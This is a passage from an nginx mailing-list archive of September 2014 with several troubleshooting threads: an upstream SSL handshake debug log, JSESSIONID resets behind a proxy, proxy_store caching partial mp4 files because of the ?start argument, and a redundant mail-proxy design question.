f -- Francis Daly francis at daoine.org From thunderhill4 at gmail.com Thu Sep 18 05:32:18 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Thu, 18 Sep 2014 11:02:18 +0530 Subject: ssl hand shake with upstream url Message-ID: Hi, I am getting ssl hand shake error. upstream server is running on 443 port. Enabled the debug in nginx. And the configuration is as follows. upstream backends { server xyz.elb.amazonaws.com:443; } server { listen 80; server_name xyz-.elb.amazonaws.com; location / { proxy_set_header Host $host; proxy_set_header Accept-Encoding ""; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-Server $host; proxy_ssl_session_reuse off; proxy_pass https://backends; } 2014/09/18 05:14:57 [debug] 2460#0: posix_memalign: 0000000000DCE430:256 @16 2014/09/18 05:14:57 [debug] 2460#0: *6 accept: xx.xx.xx.xx fd:16 2014/09/18 05:14:57 [debug] 2460#0: *6 event timer add: 16: 60000:1411017357143 2014/09/18 05:14:57 [debug] 2460#0: *6 reusable connection: 1 2014/09/18 05:14:57 [debug] 2460#0: *6 epoll add event: fd:16 op:1 ev:80000001 2014/09/18 05:14:57 [debug] 2460#0: post event 0000000000DF5110 2014/09/18 05:14:57 [debug] 2460#0: delete posted event 0000000000DF5110 2014/09/18 05:14:57 [debug] 2460#0: accept on 0.0.0.0:80, ready: 0 2014/09/18 05:14:57 [debug] 2460#0: posix_memalign: 0000000000DCE540:256 @16 2014/09/18 05:14:57 [debug] 2460#0: *7 accept: xx.xx.xx.xx fd:17 2014/09/18 05:14:57 [debug] 2460#0: *7 event timer add: 17: 60000:1411017357146 2014/09/18 05:14:57 [debug] 2460#0: *7 reusable connection: 1 2014/09/18 05:14:57 [debug] 2460#0: *7 epoll add event: fd:17 op:1 ev:80000001 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: -1 2014/09/18 05:14:57 
[debug] 2460#0: *1 SSL_get_error: 2 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 0 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: -1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_get_error: 2 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 post event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000E08A58 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: 1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL: TLSv1.2, cipher: "ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(128) Mac=AEAD" 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream send request 2014/09/18 05:14:57 [debug] 2460#0: *1 chain writer buf fl:1 s:390 2014/09/18 05:14:57 [debug] 2460#0: *1 chain writer in: 0000000000DD7470 2014/09/18 05:14:57 [debug] 2460#0: *1 malloc: 0000000000E2F450:80 2014/09/18 05:14:57 [debug] 2460#0: *1 malloc: 0000000000E1C130:16384 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL buf copy: 390 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL to write: 390 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_write: 390 2014/09/18 05:14:57 [debug] 2460#0: *1 chain writer out: 0000000000000000 2014/09/18 05:14:57 [debug] 2460#0: *1 event timer del: 9: 1411017357134 2014/09/18 05:14:57 [debug] 2460#0: *1 event timer add: 9: 60000:1411017357151 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream process header 2014/09/18 05:14:57 [debug] 2460#0: *1 malloc: 0000000000DCE650:8192 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_read: -1 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_get_error: 2 2014/09/18 05:14:57 [debug] 2460#0: *1 delete posted event 0000000000DF5248 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream request: "/?" 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream process header What is going wrong? 
-- T -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Thu Sep 18 07:40:03 2014 From: nginx-forum at nginx.us (bjorntj) Date: Thu, 18 Sep 2014 03:40:03 -0400 Subject: New session id on each request... Message-ID: I have Nginx as a reverse proxy in front of a Tomcat server running a webapp. This works ok using Firefox but not Chrome or IE... When using Chrome or IE, the JSESSIONID gets a new value for each request (instead of keeping the same value as it should). Are there some settings I am missing to fix this? (Using Apache it works for all browsers but I want to use Nginx.... :) ) Regards, BTJ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253367,253367#msg-253367 From mdounin at mdounin.ru Thu Sep 18 10:26:46 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 18 Sep 2014 14:26:46 +0400 Subject: ssl hand shake with upstream url In-Reply-To: References: Message-ID: <20140918102646.GM91749@mdounin.ru> Hello! On Thu, Sep 18, 2014 at 11:02:18AM +0530, thunder hill wrote: > Hi, > > I am getting ssl hand shake error. upstream server is running on 443 port. > Enabled the debug in nginx. > And the configuration is as follows. [...] > 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL handshake handler: 1 > 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL_do_handshake: 1 > 2014/09/18 05:14:57 [debug] 2460#0: *1 SSL: TLSv1.2, cipher: > "ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(128) > Mac=AEAD" > 2014/09/18 05:14:57 [debug] 2460#0: *1 http upstream send request [...] > What is going wrong? There is nothing wrong in the debug log provided. SSL connection was successfully established using the TLS 1.2 protocol, ECDHE-RSA-AES128-GCM-SHA256 cipher suite. -- Maxim Dounin http://nginx.org/ From shahzaib.cb at gmail.com Thu Sep 18 10:49:25 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 15:49:25 +0500 Subject: Proxy_store downloading half videos !! 
Message-ID: Hi, We're using proxy_store on the edge server for replicating requested mp4 files and some of our users reported that some of the videos are half sized and therefore they are unable to stream whole video file on their end (coming from the edge server). On digging into the access_logs of nginx, i found the 500 internal server errors for 10~20 videos and on checking the size of 500 error videos it was half of the size compare to the mirrored video files on the origin. Please check the following error of the culprit video link :- 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" I'd like to inform that the issue is coming for 40% of the videos. error_log :- 2014/09/18 15:30:40 [error] 3883#0: *77490 "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" You can see the "start time exceeds error" on edge server but the video link starting from start=736.8 exists on origin server. Nginx config :- server { listen 80; server_name lw3.files.com; root /var/www/html/tunefiles; location ~ \.(mp4|jpeg|jpg)$ { root /var/www/html/tunefiles; mp4; error_page 404 = @fetch; } location ~ \.(php)$ { proxy_pass http://fl008.files.net:80; } location @fetch { internal; proxy_pass http://fl008.origin.com:80; proxy_store on; proxy_store_access user:rw group:rw all:r; root /var/www/html/tunefiles; } } Regards. Shahzaib -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Thu Sep 18 10:55:33 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 15:55:33 +0500 Subject: Proxy_store downloading half videos !! 
In-Reply-To: References: Message-ID: nginx version: nginx/1.7.4 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module On Thu, Sep 18, 2014 at 3:49 PM, shahzaib shahzaib wrote: > Hi, > > We're using proxy_store on the edge server for replicating requested > mp4 files and some of our users reported that some of the videos are half > sized and therefore they are unable to stream whole video file on their end > (coming from the edge server). On digging into the access_logs of nginx, i > found the 500 internal server errors for 10~20 videos and on checking the > size of 500 error videos it was half of the size compare to the mirrored > video files on the origin. Please check the following error of the culprit > video link :- > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET > /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 > 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 > (compatible; MSIE 8.0; Windows NT 6.0)" > > I'd like to inform that the issue is coming for 40% of the videos. > > error_log :- > > 2014/09/18 15:30:40 [error] 3883#0: *77490 > "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start > time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, > request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 > HTTP/1.1" > > You can see the "start time exceeds error" on edge server but the video > link starting from start=736.8 exists on origin server. 
> > Nginx config :- > > server { > > listen 80; > server_name lw3.files.com; > root /var/www/html/tunefiles; > location ~ \.(mp4|jpeg|jpg)$ { > root /var/www/html/tunefiles; > mp4; > error_page 404 = @fetch; > > } > > > location ~ \.(php)$ { > proxy_pass http://fl008.files.net:80; > } > > > > location @fetch { > internal; > proxy_pass http://fl008.origin.com:80; > proxy_store on; > proxy_store_access user:rw group:rw all:r; > root /var/www/html/tunefiles; > } > > > > } > > Regards. > Shahzaib > -------------- next part -------------- An HTML attachment was scrubbed... URL: From arut at nginx.com Thu Sep 18 11:21:18 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Thu, 18 Sep 2014 15:21:18 +0400 Subject: Proxy_store downloading half videos !! In-Reply-To: References: Message-ID: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> On 18 Sep 2014, at 14:49, shahzaib shahzaib wrote: > Hi, > > We're using proxy_store on the edge server for replicating requested mp4 files and some of our users reported that some of the videos are half sized and therefore they are unable to stream whole video file on their end (coming from the edge server). On digging into the access_logs of nginx, i found the 500 internal server errors for 10~20 videos and on checking the size of 500 error videos it was half of the size compare to the mirrored video files on the origin. Please check the following error of the culprit video link :- > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" > > I'd like to inform that the issue is coming for 40% of the videos. 
> > error_log :- > > 2014/09/18 15:30:40 [error] 3883#0: *77490 "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" > > You can see the "start time exceeds error" on edge server but the video link starting from start=736.8 exists on origin server. > > Nginx config :- > > server { > > listen 80; > server_name lw3.files.com; > root /var/www/html/tunefiles; > location ~ \.(mp4|jpeg|jpg)$ { > root /var/www/html/tunefiles; > mp4; > error_page 404 = @fetch; > > } > > > location ~ \.(php)$ { > proxy_pass http://fl008.files.net:80; > } > > > > location @fetch { > internal; > proxy_pass http://fl008.origin.com:80; > proxy_store on; > proxy_store_access user:rw group:rw all:r; > root /var/www/html/tunefiles; > } Do you have the mp4 module enabled at the origin? If so then you have partial mp4 downloaded from there and stored locally. Note proxy_pass without URI passes client URIs to the origin keeping the arguments (including ?start?). From shahzaib.cb at gmail.com Thu Sep 18 11:25:33 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 16:25:33 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Yes, the mp4 modules is enabled on origin as well as edge. Could you please help me resolving the issue ? On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan wrote: > > On 18 Sep 2014, at 14:49, shahzaib shahzaib wrote: > > > Hi, > > > > We're using proxy_store on the edge server for replicating requested > mp4 files and some of our users reported that some of the videos are half > sized and therefore they are unable to stream whole video file on their end > (coming from the edge server). 
On digging into the access_logs of nginx, i > found the 500 internal server errors for 10~20 videos and on checking the > size of 500 error videos it was half of the size compare to the mirrored > video files on the origin. Please check the following error of the culprit > video link :- > > > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET > /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 > 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 > (compatible; MSIE 8.0; Windows NT 6.0)" > > > > I'd like to inform that the issue is coming for 40% of the videos. > > > > error_log :- > > > > 2014/09/18 15:30:40 [error] 3883#0: *77490 > "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start > time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, > request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 > HTTP/1.1" > > > > You can see the "start time exceeds error" on edge server but the video > link starting from start=736.8 exists on origin server. > > > > Nginx config :- > > > > server { > > > > listen 80; > > server_name lw3.files.com; > > root /var/www/html/tunefiles; > > location ~ \.(mp4|jpeg|jpg)$ { > > root /var/www/html/tunefiles; > > mp4; > > error_page 404 = @fetch; > > > > } > > > > > > location ~ \.(php)$ { > > proxy_pass http://fl008.files.net:80; > > } > > > > > > > > location @fetch { > > internal; > > proxy_pass http://fl008.origin.com:80; > > proxy_store on; > > proxy_store_access user:rw group:rw all:r; > > root /var/www/html/tunefiles; > > } > > Do you have the mp4 module enabled at the origin? If so then you have > partial mp4 > downloaded from there and stored locally. Note proxy_pass without URI > passes > client URIs to the origin keeping the arguments (including ?start?). 
> > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nmilas at noa.gr Thu Sep 18 12:02:38 2014 From: nmilas at noa.gr (Nikolaos Milas) Date: Thu, 18 Sep 2014 15:02:38 +0300 Subject: Building a redundant mail service Message-ID: <541AC9DE.7000305@noa.gr> Hello, I would appreciate your advice on the following: We are trying to build a redundant mail service, and we are investigating the use of nginx as smtp/pop3/imap proxy with TLS/SSL support (ports 25/587, 143/993, 110/995). We already have two production mail servers, vmail1 and vmail2, running postfix/dovecot (with virtual users on LDAP), each running on a separate data center. vmail1 is the main one (i.e. the one used to send mail and host users' mailboxes), vmail2 is only used as a backup. Mailboxes are using Maildir format and are being synced (in near real-time) using dovecot dsync service. IMPORTANT: Each of the two servers has its own distinct server name and its own separate certificate. This allows proper parallel operation of postfix and dovecot IMAP syncing. (I will not describe the incoming mail process, because it is beyond the scope of this mail.) Our goal is to allow our users to always use one address, say *vmail.example.com*, to automatically access SMTP/POP3/IMAP services at vmail1 and, only if vmail1 is down, at vmail2. DNS could offer a solution: creating, for example, a CNAME "vmail.example.com" pointing to vmail1 would probably solve the problem by using a very low DNS record refresh time and use a script to monitor vmail1 availability; if vmail1 is down, the script could update the CNAME to point to vmail2 instead (and force a zone refresh). This could leave a small downtime window (depending on the refresh time configured). 
Yet, I am thinking that it may be more advantageous to use another two *identical* VMs (one on each data center, for redundancy) running NGINX, with the common name (and a common certificate for) vmail.example.com (in DNS: an A record with two IP Addresses). Both proxies would automatically redirect (via NGINX) all SMTP/POP3/IMAP requests to vmail1 and, only if vmail1 is down, to vmail2, while the user will always see/configure vmail.example.com as their mail server. Is this a feasible scenario? Any hints, experiences, configuration advice, pitfalls, alternative approaches etc. would be greatly appreciated. Please advise. Thanks in advance, Nick From arut at nginx.com Thu Sep 18 13:29:21 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Thu, 18 Sep 2014 17:29:21 +0400 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Try this directive instead of yours to download the entire file from the backend proxy_pass http://fl008.origin.com$uri; On 18 Sep 2014, at 15:25, shahzaib shahzaib wrote: > Yes, the mp4 modules is enabled on origin as well as edge. Could you please help me resolving the issue ? > > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan wrote: > > On 18 Sep 2014, at 14:49, shahzaib shahzaib wrote: > > > Hi, > > > > We're using proxy_store on the edge server for replicating requested mp4 files and some of our users reported that some of the videos are half sized and therefore they are unable to stream whole video file on their end (coming from the edge server). On digging into the access_logs of nginx, i found the 500 internal server errors for 10~20 videos and on checking the size of 500 error videos it was half of the size compare to the mirrored video files on the origin. 
Please check the following error of the culprit video link :- > > > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" > > > > I'd like to inform that the issue is coming for 40% of the videos. > > > > error_log :- > > > > 2014/09/18 15:30:40 [error] 3883#0: *77490 "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" > > > > You can see the "start time exceeds error" on edge server but the video link starting from start=736.8 exists on origin server. > > > > Nginx config :- > > > > server { > > > > listen 80; > > server_name lw3.files.com; > > root /var/www/html/tunefiles; > > location ~ \.(mp4|jpeg|jpg)$ { > > root /var/www/html/tunefiles; > > mp4; > > error_page 404 = @fetch; > > > > } > > > > > > location ~ \.(php)$ { > > proxy_pass http://fl008.files.net:80; > > } > > > > > > > > location @fetch { > > internal; > > proxy_pass http://fl008.origin.com:80; > > proxy_store on; > > proxy_store_access user:rw group:rw all:r; > > root /var/www/html/tunefiles; > > } > > Do you have the mp4 module enabled at the origin? If so then you have partial mp4 > downloaded from there and stored locally. Note proxy_pass without URI passes > client URIs to the origin keeping the arguments (including ?start?). 
> > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From shahzaib.cb at gmail.com Thu Sep 18 13:32:26 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 18:32:26 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Thanks a lot for the solution Roman, i'll get back to you after applying the fix. :-) On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan wrote: > > Try this directive instead of yours to download the entire file from the > backend > > proxy_pass http://fl008.origin.com$uri; > > > On 18 Sep 2014, at 15:25, shahzaib shahzaib wrote: > > > Yes, the mp4 modules is enabled on origin as well as edge. Could you > please help me resolving the issue ? > > > > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan > wrote: > > > > On 18 Sep 2014, at 14:49, shahzaib shahzaib > wrote: > > > > > Hi, > > > > > > We're using proxy_store on the edge server for replicating > requested mp4 files and some of our users reported that some of the videos > are half sized and therefore they are unable to stream whole video file on > their end (coming from the edge server). On digging into the access_logs of > nginx, i found the 500 internal server errors for 10~20 videos and on > checking the size of 500 error videos it was half of the size compare to > the mirrored video files on the origin. 
Please check the following error of > the culprit video link :- > > > > > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET > /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 > 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 > (compatible; MSIE 8.0; Windows NT 6.0)" > > > > > > I'd like to inform that the issue is coming for 40% of the videos. > > > > > > error_log :- > > > > > > 2014/09/18 15:30:40 [error] 3883#0: *77490 > "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start > time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, > request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 > HTTP/1.1" > > > > > > You can see the "start time exceeds error" on edge server but the > video link starting from start=736.8 exists on origin server. > > > > > > Nginx config :- > > > > > > server { > > > > > > listen 80; > > > server_name lw3.files.com; > > > root /var/www/html/tunefiles; > > > location ~ \.(mp4|jpeg|jpg)$ { > > > root /var/www/html/tunefiles; > > > mp4; > > > error_page 404 = @fetch; > > > > > > } > > > > > > > > > location ~ \.(php)$ { > > > proxy_pass http://fl008.files.net:80; > > > } > > > > > > > > > > > > location @fetch { > > > internal; > > > proxy_pass http://fl008.origin.com:80; > > > proxy_store on; > > > proxy_store_access user:rw group:rw all:r; > > > root /var/www/html/tunefiles; > > > } > > > > Do you have the mp4 module enabled at the origin? If so then you have > partial mp4 > > downloaded from there and stored locally. Note proxy_pass without URI > passes > > client URIs to the origin keeping the arguments (including ?start?). 
> > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Thu Sep 18 13:43:24 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 18:43:24 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: >>proxy_pass http://fl008.origin.com$uri; It didn't work instead the error 502 gateway started to show up when proxying the request via proxy_pass. On Thu, Sep 18, 2014 at 6:32 PM, shahzaib shahzaib wrote: > Thanks a lot for the solution Roman, i'll get back to you after applying > the fix. :-) > > On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan wrote: > >> >> Try this directive instead of yours to download the entire file from the >> backend >> >> proxy_pass http://fl008.origin.com$uri; >> >> >> On 18 Sep 2014, at 15:25, shahzaib shahzaib >> wrote: >> >> > Yes, the mp4 modules is enabled on origin as well as edge. Could you >> please help me resolving the issue ? >> > >> > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan >> wrote: >> > >> > On 18 Sep 2014, at 14:49, shahzaib shahzaib >> wrote: >> > >> > > Hi, >> > > >> > > We're using proxy_store on the edge server for replicating >> requested mp4 files and some of our users reported that some of the videos >> are half sized and therefore they are unable to stream whole video file on >> their end (coming from the edge server). 
On digging into the access_logs of >> nginx, i found the 500 internal server errors for 10~20 videos and on >> checking the size of 500 error videos it was half of the size compare to >> the mirrored video files on the origin. Please check the following error of >> the culprit video link :- >> > > >> > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET >> /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 >> 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 >> (compatible; MSIE 8.0; Windows NT 6.0)" >> > > >> > > I'd like to inform that the issue is coming for 40% of the videos. >> > > >> > > error_log :- >> > > >> > > 2014/09/18 15:30:40 [error] 3883#0: *77490 >> "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start >> time exceeds file duration, client: 175.110.88.213, server: lw3.files.com, >> request: "GET /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 >> HTTP/1.1" >> > > >> > > You can see the "start time exceeds error" on edge server but the >> video link starting from start=736.8 exists on origin server. >> > > >> > > Nginx config :- >> > > >> > > server { >> > > >> > > listen 80; >> > > server_name lw3.files.com; >> > > root /var/www/html/tunefiles; >> > > location ~ \.(mp4|jpeg|jpg)$ { >> > > root /var/www/html/tunefiles; >> > > mp4; >> > > error_page 404 = @fetch; >> > > >> > > } >> > > >> > > >> > > location ~ \.(php)$ { >> > > proxy_pass http://fl008.files.net:80; >> > > } >> > > >> > > >> > > >> > > location @fetch { >> > > internal; >> > > proxy_pass http://fl008.origin.com:80; >> > > proxy_store on; >> > > proxy_store_access user:rw group:rw all:r; >> > > root /var/www/html/tunefiles; >> > > } >> > >> > Do you have the mp4 module enabled at the origin? If so then you have >> partial mp4 >> > downloaded from there and stored locally. Note proxy_pass without URI >> passes >> > client URIs to the origin keeping the arguments (including ?start?). 
>> > >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> > >> > _______________________________________________ >> > nginx mailing list >> > nginx at nginx.org >> > http://mailman.nginx.org/mailman/listinfo/nginx >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Thu Sep 18 13:45:15 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 18 Sep 2014 18:45:15 +0500 Subject: Proxy_store downloading half videos !! In-Reply-To: References: <055B9460-9749-4613-9C04-DB01C64E8E6C@nginx.com> Message-ID: Looks like on using the proxy_pass http://fl008.origin.com:80 $uri; it worked . Could :80 be the issue ? On Thu, Sep 18, 2014 at 6:43 PM, shahzaib shahzaib wrote: > >>proxy_pass http://fl008.origin.com$uri; > It didn't work instead the error 502 gateway started to show up when > proxying the request via proxy_pass. > > On Thu, Sep 18, 2014 at 6:32 PM, shahzaib shahzaib > wrote: > >> Thanks a lot for the solution Roman, i'll get back to you after applying >> the fix. :-) >> >> On Thu, Sep 18, 2014 at 6:29 PM, Roman Arutyunyan wrote: >> >>> >>> Try this directive instead of yours to download the entire file from the >>> backend >>> >>> proxy_pass http://fl008.origin.com$uri; >>> >>> >>> On 18 Sep 2014, at 15:25, shahzaib shahzaib >>> wrote: >>> >>> > Yes, the mp4 modules is enabled on origin as well as edge. Could you >>> please help me resolving the issue ? 
>>> > >>> > On Thu, Sep 18, 2014 at 4:21 PM, Roman Arutyunyan >>> wrote: >>> > >>> > On 18 Sep 2014, at 14:49, shahzaib shahzaib >>> wrote: >>> > >>> > > Hi, >>> > > >>> > > We're using proxy_store on the edge server for replicating >>> requested mp4 files and some of our users reported that some of the videos >>> are half sized and therefore they are unable to stream whole video file on >>> their end (coming from the edge server). On digging into the access_logs of >>> nginx, i found the 500 internal server errors for 10~20 videos and on >>> checking the size of 500 error videos it was half of the size compare to >>> the mirrored video files on the origin. Please check the following error of >>> the culprit video link :- >>> > > >>> > > 203.124.62.213 - - [18/Sep/2014:15:13:58 +0500] "GET >>> /files/videos/2014/09/12/1410536044adf1b-360.mp4?start=729 HTTP/1.1" 500 >>> 588 "http://lw3.files.com/files/videos/2014/09/12/" "Mozilla/4.0 >>> (compatible; MSIE 8.0; Windows NT 6.0)" >>> > > >>> > > I'd like to inform that the issue is coming for 40% of the videos. >>> > > >>> > > error_log :- >>> > > >>> > > 2014/09/18 15:30:40 [error] 3883#0: *77490 >>> "/var/www/html/files/videos/2014/09/16/141088548798bb1-360.mp4" mp4 start >>> time exceeds file duration, client: 175.110.88.213, server: >>> lw3.files.com, request: "GET >>> /files/videos/2014/09/16/141088548798bb1-360.mp4?start=736.8 HTTP/1.1" >>> > > >>> > > You can see the "start time exceeds error" on edge server but the >>> video link starting from start=736.8 exists on origin server. 
>>> > > >>> > > Nginx config :- >>> > > >>> > > server { >>> > > >>> > > listen 80; >>> > > server_name lw3.files.com; >>> > > root /var/www/html/tunefiles; >>> > > location ~ \.(mp4|jpeg|jpg)$ { >>> > > root /var/www/html/tunefiles; >>> > > mp4; >>> > > error_page 404 = @fetch; >>> > > >>> > > } >>> > > >>> > > >>> > > location ~ \.(php)$ { >>> > > proxy_pass http://fl008.files.net:80; >>> > > } >>> > > >>> > > >>> > > >>> > > location @fetch { >>> > > internal; >>> > > proxy_pass http://fl008.origin.com:80; >>> > > proxy_store on; >>> > > proxy_store_access user:rw group:rw all:r; >>> > > root /var/www/html/tunefiles; >>> > > } >>> > >>> > Do you have the mp4 module enabled at the origin? If so then you have >>> partial mp4 >>> > downloaded from there and stored locally. Note proxy_pass without URI >>> passes >>> > client URIs to the origin keeping the arguments (including ?start?). >>> > >>> > _______________________________________________ >>> > nginx mailing list >>> > nginx at nginx.org >>> > http://mailman.nginx.org/mailman/listinfo/nginx >>> > >>> > _______________________________________________ >>> > nginx mailing list >>> > nginx at nginx.org >>> > http://mailman.nginx.org/mailman/listinfo/nginx >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> > -------------- next part -------------- An HTML attachment was scrubbed... URL: From pcgeopc at gmail.com Thu Sep 18 14:04:32 2014 From: pcgeopc at gmail.com (Geo P.C.) Date: Thu, 18 Sep 2014 19:34:32 +0530 Subject: Redirect to a different url based on a query. Message-ID: We have a wordpress installation and need to redirect lost password link to another different url for this we trying to setup a redirect 